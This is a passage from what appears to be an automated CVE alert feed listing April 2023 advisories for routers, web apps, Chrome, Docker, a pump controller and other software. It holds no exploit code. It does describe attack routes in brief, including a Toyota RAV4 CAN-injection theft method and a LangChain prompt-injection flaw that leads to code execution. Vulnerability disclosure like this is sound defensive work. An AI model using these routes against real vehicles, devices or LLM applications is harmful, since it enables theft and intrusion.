🚨 CVE-2023-20137Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device and then persuading a user to visit specific web pages that include malicious payloads. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has not released software updates that address these vulnerabilities.🎖@cveNotify |
|
| 2023-04-05 21:58:13 |
🚨 CVE-2023-20139Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device and then persuading a user to visit specific web pages that include malicious payloads. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has not released software updates that address these vulnerabilities.🎖@cveNotify |
|
| 2023-04-05 21:58:12 |
🚨 CVE-2023-20141Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device and then persuading a user to visit specific web pages that include malicious payloads. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has not released software updates that address these vulnerabilities.🎖@cveNotify |
|
| 2023-04-05 21:58:11 |
🚨 CVE-2023-20142Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. These vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device and then persuading a user to visit specific web pages that include malicious payloads. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco has not released software updates that address these vulnerabilities.🎖@cveNotify |
|
| 2023-04-05 18:58:29 |
🚨 CVE-2023-1756Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-05 18:58:28 |
🚨 CVE-2023-1757Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-05 18:58:27 |
🚨 CVE-2023-1758Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-05 18:58:22 |
🚨 CVE-2023-20022Multiple vulnerabilities in specific Cisco Identity Services Engine (ISE) CLI commands could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit these vulnerabilities, an attacker must have valid Administrator privileges on the affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.🎖@cveNotify |
|
| 2023-04-05 18:58:21 |
🚨 CVE-2023-20023Multiple vulnerabilities in specific Cisco Identity Services Engine (ISE) CLI commands could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit these vulnerabilities, an attacker must have valid Administrator privileges on the affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.🎖@cveNotify |
|
| 2023-04-05 18:58:20 |
🚨 CVE-2023-20030A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information, conduct a server-side request forgery (SSRF) attack through an affected device, or negatively impact the responsiveness of the web-based management interface itself. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of confidential information. A successful exploit could also cause the web application to perform arbitrary HTTP requests on behalf of the attacker or consume memory resources to reduce the availability of the web-based management interface. To successfully exploit this vulnerability, an attacker would need valid Super Admin or Policy Admin credentials.🎖@cveNotify |
|
| 2023-04-05 18:58:19 |
🚨 CVE-2023-20068A vulnerability in the web-based management interface of Cisco Prime Infrastructure Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user of the web-based management interface on an affected device to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or to access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-04-05 18:58:15 |
🚨 CVE-2023-20073A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.🎖@cveNotify |
|
| 2023-04-05 18:58:14 |
🚨 CVE-2023-22291An invalid free vulnerability exists in the Frame stream parser functionality of Ichitaro 2022 1.0.1.57600. A specially crafted document can lead to an attempt to free a stack pointer, which causes memory corruption. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-05 18:58:13 |
🚨 CVE-2023-22660A heap-based buffer overflow vulnerability exists in the way Ichitaro version 2022 1.0.1.57600 processes certain LayoutBox stream record types. A specially crafted document can cause a buffer overflow, leading to memory corruption, which can result in arbitrary code execution.To trigger this vulnerability, the victim would need to open a malicious, attacker-created document.🎖@cveNotify |
|
| 2023-04-05 18:58:12 |
🚨 CVE-2023-29389Toyota RAV4 2021 vehicles automatically trust messages from other ECUs on a CAN bus, which allows physically proximate attackers to drive a vehicle by accessing the control CAN bus after pulling the bumper away and reaching the headlight connector, and then sending forged "Key is validated" messages via CAN Injection, as exploited in the wild in (for example) July 2022.🎖@cveNotify |
|
| 2023-04-05 16:58:22 |
🚨 CVE-2023-26116All versions of the package angular are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.🎖@cveNotify |
|
| 2023-04-05 16:58:21 |
🚨 CVE-2022-44368NASM v2.16 was discovered to contain a null pointer deference in the NASM component🎖@cveNotify |
|
| 2023-04-05 16:58:20 |
🚨 CVE-2023-24473An information disclosure vulnerability exists in the TGAInput::read_tga2_header functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted targa file can lead to a disclosure of sensitive information. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-05 16:58:16 |
🚨 CVE-2023-20107A vulnerability in the deterministic random bit generator (DRBG), also known as pseudorandom number generator (PRNG), in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco ASA 5506-X, ASA 5508-X, and ASA 5516-X Firewalls could allow an unauthenticated, remote attacker to cause a cryptographic collision, enabling the attacker to discover the private key of an affected device. This vulnerability is due to insufficient entropy in the DRBG for the affected hardware platforms when generating cryptographic keys. An attacker could exploit this vulnerability by generating a large number of cryptographic keys on an affected device and looking for collisions with target devices. A successful exploit could allow the attacker to impersonate an affected target device or to decrypt traffic secured by an affected key that is sent to or from an affected target device.🎖@cveNotify |
|
| 2023-04-05 16:58:15 |
🚨 CVE-2023-1865The YourChannel plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check when resetting plugin settings via the yrc_nuke GET parameter in versions up to, and including, 1.2.3. This makes it possible for unauthenticated attackers to delete YouTube channels from the plugin.🎖@cveNotify |
|
| 2023-04-05 14:58:39 |
🚨 CVE-2023-1075A flaw was found in the Linux Kernel. The tls_is_tx_ready() incorrectly checks for list emptiness, potentially accessing a type confused entry to the list_head, leaking the last byte of the confused field that overlaps with rec->tx_ready.🎖@cveNotify |
|
| 2023-04-05 14:58:38 |
🚨 CVE-2023-1735A vulnerability classified as critical was found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. Affected by this vulnerability is an unknown functionality of the file passwordrecover.php. The manipulation of the argument phonenumber leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-224623.🎖@cveNotify |
|
| 2023-04-05 14:58:37 |
🚨 CVE-2023-1736A vulnerability, which was classified as critical, has been found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. Affected by this issue is some unknown functionality of the file cart/controller.php?action=add. The manipulation of the argument PROID leads to sql injection. The identifier of this vulnerability is VDB-224624.🎖@cveNotify |
|
| 2023-04-05 14:58:36 |
🚨 CVE-2023-1737A vulnerability, which was classified as critical, was found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument U_USERNAME leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-224625 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 14:58:34 |
🚨 CVE-2023-1734A vulnerability classified as critical has been found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. Affected is an unknown function of the file admin/products/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. VDB-224622 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 14:58:30 |
🚨 CVE-2023-1725Server-Side Request Forgery (SSRF) vulnerability in Infoline Project Management System allows Server Side Request Forgery.This issue affects Project Management System: before 4.09.31.125.🎖@cveNotify |
|
| 2023-04-05 14:58:29 |
🚨 CVE-2013-10022A vulnerability, which was classified as problematic, has been found in BestWebSoft Contact Form Plugin 3.51. Affected by this issue is the function cntctfrm_display_form/cntctfrm_check_form of the file contact_form.php. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 3.52 is able to address this issue. The name of the patch is 642ef1dc1751ab6642ce981fe126325bb574f898. It is recommended to upgrade the affected component. VDB-225002 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 14:58:28 |
🚨 CVE-2022-28310This vulnerability allows remote attackers to execute arbitrary code on affected installations of Bentley MicroStation CONNECT 10.16.02.034. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16339.🎖@cveNotify |
|
| 2023-04-05 14:58:27 |
🚨 CVE-2023-28654Osprey Pump Controller version 1.01 has a hidden administrative account that has the hardcoded password that allows full access to the web management interface configuration. The user is not visible in Usernames and Passwords menu list of the application and the password cannot be changed through any normal operation of the device.🎖@cveNotify |
|
| 2023-04-05 14:58:23 |
🚨 CVE-2023-28712Osprey Pump Controller version 1.01 contains an unauthenticated command injection vulnerability that could allow system access with www-data permissions.🎖@cveNotify |
|
| 2023-04-05 14:58:22 |
🚨 CVE-2023-28718Osprey Pump Controller version 1.01 allows users to perform certain actions via HTTP requests without performing any checks to verify the requests. This may allow an attacker to perform certain actions with administrative privileges if a logged-in user visits a malicious website.🎖@cveNotify |
|
| 2023-04-05 14:58:21 |
🚨 CVE-2023-28398Osprey Pump Controller version 1.01 could allow an unauthenticated user to create an account and bypass authentication, thereby gaining unauthorized access to the system. A threat actor could exploit this vulnerability to create a user account without providing valid credentials. A threat actor who successfully exploits this vulnerability could gain access to the pump controller and cause disruption in operation, modify data, or shut down the controller.🎖@cveNotify |
|
| 2023-04-05 14:58:20 |
🚨 CVE-2023-28648Osprey Pump Controller version 1.01 inputs passed to a GET parameter are not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.🎖@cveNotify |
|
| 2023-04-05 14:58:19 |
🚨 CVE-2023-27394Osprey Pump Controller version 1.01 is vulnerable an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through a HTTP GET parameter called by DataLogView.php, EventsView.php and AlarmsView.php scripts.🎖@cveNotify |
|
| 2023-04-05 14:58:15 |
🚨 CVE-2023-27886Osprey Pump Controller version 1.01 is vulnerable to an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through a HTTP POST parameter called by index.php script.🎖@cveNotify |
|
| 2023-04-05 14:58:14 |
🚨 CVE-2023-0382User-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1 due to uncontrolled memory consumption.🎖@cveNotify |
|
| 2023-04-05 14:58:13 |
🚨 CVE-2023-1845A vulnerability, which was classified as critical, was found in SourceCodester Online Payroll System 1.0. This affects an unknown part of the file /admin/employee_row.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224985 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 14:58:12 |
🚨 CVE-2023-1846A vulnerability has been found in SourceCodester Online Payroll System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/deduction_row.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224986 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 11:58:20 |
🚨 CVE-2022-2239The Request a Quote WordPress plugin before 2.3.9 does not sanitise and escape some of its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-04-05 11:58:19 |
🚨 CVE-2021-24489The Request a Quote WordPress plugin before 2.3.9 does not sanitise, validate or escape some of its settings in the admin dashboard, leading to authenticated Stored Cross-Site Scripting issues even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-04-05 11:58:18 |
🚨 CVE-2023-1845A vulnerability, which was classified as critical, was found in SourceCodester Online Payroll System 1.0. This affects an unknown part of the file /admin/employee_row.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224985 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 11:58:14 |
🚨 CVE-2023-1847A vulnerability was found in SourceCodester Online Payroll System 1.0 and classified as critical. This issue affects some unknown processing of the file attendance.php. The manipulation of the argument employee leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224987.🎖@cveNotify |
|
| 2023-04-05 11:58:13 |
🚨 CVE-2023-1051Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in As Koc Energy Web Report System allows Reflected XSS.This issue affects Web Report System: before 23.03.10.🎖@cveNotify |
|
| 2023-04-05 11:58:12 |
🚨 CVE-2023-0320Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Izmir Katip Celebi University UBYS allows Stored XSS.This issue affects UBYS: before 23.03.16.🎖@cveNotify |
|
| 2023-04-05 05:58:34 |
🚨 CVE-2023-1690A vulnerability, which was classified as problematic, has been found in SourceCodester Earnings and Expense Tracker App 1.0. This issue affects some unknown processing of the file LoginRegistration.php?a=register_user. The manipulation of the argument fullname leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-224309 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 05:58:33 |
🚨 CVE-2023-29374In LangChain through 0.0.131, the LLMMathChain chain allows prompt injection attacks that can execute arbitrary code via the Python exec method.🎖@cveNotify |
|
| 2023-04-05 05:58:32 |
🚨 CVE-2023-0213Elevation of privilege issue in M-Files Installer versions before 22.6 on Windows allows user to gain SYSTEM privileges via DLL hijacking.🎖@cveNotify |
|
| 2023-04-05 05:58:31 |
🚨 CVE-2023-1684A vulnerability was found in HadSky 7.7.16. It has been classified as problematic. This affects an unknown part of the file upload/index.php?c=app&a=superadmin:index. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224241 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 05:58:27 |
🚨 CVE-2023-25721Veracode Scan Jenkins Plugin before 23.3.19.0, when the "Connect using proxy" option is enabled and configured with proxy credentials and when the Jenkins global system setting debug is enabled and when a scan is configured for remote agent jobs, allows users (with access to view the job log) to discover proxy credentials.🎖@cveNotify |
|
| 2023-04-05 05:58:26 |
🚨 CVE-2023-25722A credential-leak issue was discovered in related Veracode products before 2023-03-27. Veracode Scan Jenkins Plugin before 23.3.19.0, when configured for remote agent jobs, invokes the Veracode Java API Wrapper in a manner that allows local users (with OS-level access of the Jenkins remote) to discover Veracode API credentials by listing the process and its arguments. Veracode Scan Jenkins Plugin before 23.3.19.0, when configured for remote agent jobs and when the "Connect using proxy" option is enabled and configured with proxy credentials, allows local users of the Jenkins remote to discover proxy credentials by listing the process and its arguments. Veracode Azure DevOps Extension before 3.20.0 invokes the Veracode Java API Wrapper in a manner that allows local users (with OS-level access to the Azure DevOps Services cloud infrastructure or Azure DevOps Server) to discover Veracode API credentials by listing the process and its arguments. Veracode Azure DevOps Extension before 3.20.0, when configured with proxy credentials, allows users (with shell access to the Azure DevOps Services cloud infrastructure or Azure DevOps Server) to discover proxy credentials by listing the process and its arguments.🎖@cveNotify |
|
| 2023-04-05 05:58:25 |
🚨 CVE-2023-1682A vulnerability has been found in Xunrui CMS 4.61 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /dayrui/My/Config/Install.txt. The manipulation leads to direct request. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224239.🎖@cveNotify |
|
| 2023-04-05 05:58:24 |
🚨 CVE-2023-1675A vulnerability was found in SourceCodester School Registration and Fee System 1.0. It has been classified as critical. Affected is an unknown function of the file /bilal final/edit_stud.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224232.🎖@cveNotify |
|
| 2023-04-05 05:58:21 |
🚨 CVE-2023-1674A vulnerability was found in SourceCodester School Registration and Fee System 1.0 and classified as critical. This issue affects some unknown processing of the file /bilal final/login.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224231.🎖@cveNotify |
|
| 2023-04-05 05:58:20 |
🚨 CVE-2023-1676A vulnerability was found in DriverGenius 9.70.0.346. It has been declared as critical. Affected by this vulnerability is the function 0x9C402088 in the library mydrivers64.sys of the component IOCTL Handler. The manipulation leads to memory corruption. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-224233 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-05 05:58:19 |
🚨 CVE-2023-26071An issue was discovered in MCUBO ICT through 10.12.4 (aka 6.0.2). An Observable Response Discrepancy can occur under the login web page. In particular, the web application provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor. That allow an unauthorized actor to perform User Enumeration attacks.🎖@cveNotify |
|
| 2023-04-05 05:58:18 |
🚨 CVE-2022-36059matrix-js-sdk is a Matrix messaging protocol Client-Server SDK for JavaScript. In versions prior to 19.4.0 events sent with special strings in key places can temporarily disrupt or impede the matrix-js-sdk from functioning properly, potentially impacting the consumer's ability to process data safely. Note that the matrix-js-sdk can appear to be operating normally but be excluding or corrupting runtime data presented to the consumer. This issue has been fixed in matrix-js-sdk 19.4.0 and users are advised to upgrade. Users unable to upgrade may mitigate this issue by redacting applicable events, waiting for the sync processor to store data, and restarting the client. Alternatively, redacting the applicable events and clearing all storage will often fix most perceived issues. In some cases, no workarounds are possible.🎖@cveNotify |
|
| 2023-04-05 05:58:14 |
🚨 CVE-2020-8889The ShipStation.com plugin 1.0 for CS-Cart allows remote attackers to obtain sensitive information (via action=export) because a typo results in a successful comparison of a blank password and NULL.🎖@cveNotify |
|
| 2023-04-05 05:58:13 |
🚨 CVE-2022-36060matrix-react-sdk is a Matrix chat protocol SDK for React Javascript. Events sent with special strings in key places can temporarily disrupt or impede the matrix-react-sdk from functioning properly, such as by causing room or event tile crashes. The remainder of the application can appear functional, though certain rooms/events will not be rendered. This issue has been fixed in matrix-react-sdk 3.53.0 and users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-05 05:58:12 |
🚨 CVE-2023-1518CP Plus KVMS Pro versions 2.01.0.T.190521 and prior are vulnerable to sensitive credentials being leaked because they are insufficiently protected.🎖@cveNotify |
|
| 2023-04-05 00:58:36 |
🚨 CVE-2023-24304Improper input validation in the PDF.dll plugin of IrfanView v4.60 allows attackers to execute arbitrary code via opening a crafted PDF file.🎖@cveNotify |
|
| 2023-04-05 00:58:35 |
🚨 CVE-2023-1810Heap buffer overflow in Visuals in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-05 00:58:34 |
🚨 CVE-2023-1811Use after free in Frames in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-05 00:58:33 |
🚨 CVE-2023-1814Insufficient validation of untrusted input in Safe Browsing in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to bypass download checking via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-05 00:58:29 |
🚨 CVE-2023-1815Use after free in Networking APIs in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-05 00:58:28 |
🚨 CVE-2023-1816Incorrect security UI in Picture In Picture in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially perform navigation spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-05 00:58:27 |
🚨 CVE-2023-1817Insufficient policy enforcement in Intents in Google Chrome on Android prior to 112.0.5615.49 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-05 00:58:26 |
🚨 CVE-2023-1819Out of bounds read in Accessibility in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-05 00:58:22 |
🚨 CVE-2023-1820Heap buffer overflow in Browser History in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-05 00:58:21 |
🚨 CVE-2023-1821Inappropriate implementation in WebShare in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially hide the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-05 00:58:20 |
🚨 CVE-2023-1822Incorrect security UI in Navigation in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-05 00:58:19 |
🚨 CVE-2023-0265Uvdesk version 1.1.1 allows an authenticated remote attacker to execute commands on the server. This is possible because the application does not properly validate profile pictures uploaded by customers.🎖@cveNotify |
|
| 2023-04-05 00:58:15 |
🚨 CVE-2023-0325Uvdesk version 1.1.1 allows an unauthenticated remote attacker to exploit a stored XSS in the application. This is possible because the application does not correctly validate the message sent by the clients in the ticket.🎖@cveNotify |
|
| 2023-04-05 00:58:14 |
🚨 CVE-2023-28840Moby is an open source container framework developed by Docker Inc. that is distributed as Docker, Mirantis Container Runtime, and various other downstream projects/products. The Moby daemon component (`dockerd`), which is developed as moby/moby, is commonly referred to as *Docker*. Swarm Mode, which is compiled in and delivered by default in dockerd and is thus present in most major Moby downstreams, is a simple, built-in container orchestrator that is implemented through a combination of SwarmKit and supporting network code. The overlay network driver is a core feature of Swarm Mode, providing isolated virtual LANs that allow communication between containers and services across the cluster. This driver is an implementation/user of VXLAN, which encapsulates link-layer (Ethernet) frames in UDP datagrams that tag the frame with a VXLAN Network ID (VNI) that identifies the originating overlay network. In addition, the overlay network driver supports an optional, off-by-default encrypted mode, which is especially useful when VXLAN packets traverses an untrusted network between nodes. Encrypted overlay networks function by encapsulating the VXLAN datagrams through the use of the IPsec Encapsulating Security Payload protocol in Transport mode. By deploying IPSec encapsulation, encrypted overlay networks gain the additional properties of source authentication through cryptographic proof, data integrity through check-summing, and confidentiality through encryption. When setting an endpoint up on an encrypted overlay network, Moby installs three iptables (Linux kernel firewall) rules that enforce both incoming and outgoing IPSec. These rules rely on the u32 iptables extension provided by the xt_u32 kernel module to directly filter on a VXLAN packet's VNI field, so that IPSec guarantees can be enforced on encrypted overlay networks without interfering with other overlay networks or other users of VXLAN. Two iptables rules serve to filter incoming VXLAN datagrams with a VNI that corresponds to an encrypted network and discards unencrypted datagrams. The rules are appended to the end of the INPUT filter chain, following any rules that have been previously set by the system administrator. Administrator-set rules take precedence over the rules Moby sets to discard unencrypted VXLAN datagrams, which can potentially admit unencrypted datagrams that should have been discarded. The injection of arbitrary Ethernet frames can enable a Denial of Service attack. A sophisticated attacker may be able to establish a UDP or TCP connection by way of the container’s outbound gateway that would otherwise be blocked by a stateful firewall, or carry out other escalations beyond simple injection by smuggling packets into the overlay network. Patches are available in Moby releases 23.0.3 and 20.10.24. As Mirantis Container Runtime's 20.10 releases are numbered differently, users of that platform should update to 20.10.16. Some workarounds are available. Close the VXLAN port (by default, UDP port 4789) to incoming traffic at the Internet boundary to prevent all VXLAN packet injection, and/or ensure that the `xt_u32` kernel module is available on all nodes of the Swarm cluster.🎖@cveNotify |
|
| 2023-04-05 00:58:13 |
🚨 CVE-2023-28841Moby is an open source container framework developed by Docker Inc. that is distributed as Docker, Mirantis Container Runtime, and various other downstream projects/products. The Moby daemon component (`dockerd`), which is developed as moby/moby is commonly referred to as *Docker*. Swarm Mode, which is compiled in and delivered by default in `dockerd` and is thus present in most major Moby downstreams, is a simple, built-in container orchestrator that is implemented through a combination of SwarmKit and supporting network code. The `overlay` network driver is a core feature of Swarm Mode, providing isolated virtual LANs that allow communication between containers and services across the cluster. This driver is an implementation/user of VXLAN, which encapsulates link-layer (Ethernet) frames in UDP datagrams that tag the frame with the VXLAN metadata, including a VXLAN Network ID (VNI) that identifies the originating overlay network. In addition, the overlay network driver supports an optional, off-by-default encrypted mode, which is especially useful when VXLAN packets traverses an untrusted network between nodes. Encrypted overlay networks function by encapsulating the VXLAN datagrams through the use of the IPsec Encapsulating Security Payload protocol in Transport mode. By deploying IPSec encapsulation, encrypted overlay networks gain the additional properties of source authentication through cryptographic proof, data integrity through check-summing, and confidentiality through encryption. When setting an endpoint up on an encrypted overlay network, Moby installs three iptables (Linux kernel firewall) rules that enforce both incoming and outgoing IPSec. These rules rely on the `u32` iptables extension provided by the `xt_u32` kernel module to directly filter on a VXLAN packet's VNI field, so that IPSec guarantees can be enforced on encrypted overlay networks without interfering with other overlay networks or other users of VXLAN. An iptables rule designates outgoing VXLAN datagrams with a VNI that corresponds to an encrypted overlay network for IPsec encapsulation. Encrypted overlay networks on affected platforms silently transmit unencrypted data. As a result, `overlay` networks may appear to be functional, passing traffic as expected, but without any of the expected confidentiality or data integrity guarantees. It is possible for an attacker sitting in a trusted position on the network to read all of the application traffic that is moving across the overlay network, resulting in unexpected secrets or user data disclosure. Thus, because many database protocols, internal APIs, etc. are not protected by a second layer of encryption, a user may use Swarm encrypted overlay networks to provide confidentiality, which due to this vulnerability this is no longer guaranteed. Patches are available in Moby releases 23.0.3, and 20.10.24. As Mirantis Container Runtime's 20.10 releases are numbered differently, users of that platform should update to 20.10.16. Some workarounds are available. Close the VXLAN port (by default, UDP port 4789) to outgoing traffic at the Internet boundary in order to prevent unintentionally leaking unencrypted traffic over the Internet, and/or ensure that the `xt_u32` kernel module is available on all nodes of the Swarm cluster.🎖@cveNotify |
|
| 2023-04-05 00:58:12 |
🚨 CVE-2023-28842Moby) is an open source container framework developed by Docker Inc. that is distributed as Docker, Mirantis Container Runtime, and various other downstream projects/products. The Moby daemon component (`dockerd`), which is developed as moby/moby is commonly referred to as *Docker*. Swarm Mode, which is compiled in and delivered by default in `dockerd` and is thus present in most major Moby downstreams, is a simple, built-in container orchestrator that is implemented through a combination of SwarmKit and supporting network code. The `overlay` network driver is a core feature of Swarm Mode, providing isolated virtual LANs that allow communication between containers and services across the cluster. This driver is an implementation/user of VXLAN, which encapsulates link-layer (Ethernet) frames in UDP datagrams that tag the frame with the VXLAN metadata, including a VXLAN Network ID (VNI) that identifies the originating overlay network. In addition, the overlay network driver supports an optional, off-by-default encrypted mode, which is especially useful when VXLAN packets traverses an untrusted network between nodes. Encrypted overlay networks function by encapsulating the VXLAN datagrams through the use of the IPsec Encapsulating Security Payload protocol in Transport mode. By deploying IPSec encapsulation, encrypted overlay networks gain the additional properties of source authentication through cryptographic proof, data integrity through check-summing, and confidentiality through encryption. When setting an endpoint up on an encrypted overlay network, Moby installs three iptables (Linux kernel firewall) rules that enforce both incoming and outgoing IPSec. These rules rely on the `u32` iptables extension provided by the `xt_u32` kernel module to directly filter on a VXLAN packet's VNI field, so that IPSec guarantees can be enforced on encrypted overlay networks without interfering with other overlay networks or other users of VXLAN. The `overlay` driver dynamically and lazily defines the kernel configuration for the VXLAN network on each node as containers are attached and detached. Routes and encryption parameters are only defined for destination nodes that participate in the network. The 